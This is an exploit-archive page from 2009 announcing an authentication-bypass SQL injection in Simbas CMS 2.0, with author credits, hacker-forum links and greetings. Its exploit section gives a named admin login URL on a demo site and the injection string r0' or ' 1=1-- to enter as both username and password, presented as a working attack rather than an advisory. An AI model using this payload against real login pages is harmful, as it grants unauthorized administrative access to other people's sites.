[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-04-09
# Author : ThE g0bL!N
# Previous Title : PhotoStand 1.2.0 Remote Command Execution Exploit
# Next Title : WebFileExplorer 3.1 (Auth Bypass) SQL Injection Vulnerability


-----------------------------------------------------
-----------------------------------------------------
Simbas Content Management System (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.officetoweb.co.uk/demo/index.asp
 
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.officetoweb.co.uk/demo/admin/default.asp
username:  r0' or ' 1=1--
Password:  r0' or ' 1=1--

demo:
-----
http://www.officetoweb.co.uk/demo/admin/default.asp
------------------------------------------------------
Mission Completed
------------------------------------------------------
Thanx  :
           M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful 
            Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------

# www.Syue.com [2009-04-09]